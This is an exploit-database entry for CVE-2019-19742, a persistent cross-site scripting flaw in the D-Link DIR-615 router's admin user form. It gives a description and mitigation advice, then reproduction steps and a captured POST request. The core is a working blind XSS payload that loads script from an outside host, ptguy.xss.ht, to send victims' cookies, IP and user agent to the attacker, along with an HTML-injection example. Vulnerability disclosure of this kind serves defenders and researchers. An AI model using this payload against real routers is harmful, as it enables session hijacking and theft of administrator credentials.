D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting

vendor:

DIR-615 Wireless Router

by:

Sanyam Chawla

4.8

CVSS

MEDIUM

Persistent Cross-Site Scripting

CWE

Product Name: DIR-615 Wireless Router

Affected Version From: T1

Affected Version To: T1

Patch Exists: YES

Related CWE: CVE-2019-19742

CPE: h:dlink:dir-615:20.07

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Kali Linux

2019

D-Link DIR-615 Wireless Router – Persistent Cross-Site Scripting

The D-Link DIR-615 Wireless Router is vulnerable to persistent cross-site scripting. An attacker can inject malicious script into the name field, which gets saved by the server and is reflected on the user page. This allows the attacker to execute the script and gather sensitive information from the victim, such as IP, cookies, and user agent. Additionally, HTML injection is possible by inserting HTML tags into the username field.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the D-Link DIR-615 Wireless Router to the latest version. Additionally, input validation should be implemented to sanitize user input and prevent script injection.

Source

Exploit-DB raw data:

# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting
# Date: 2019-12-13
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19742

Reproduction Steps:
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to Maintenance page and click on Admin on the left panel
3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.

#Burp Intercept

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send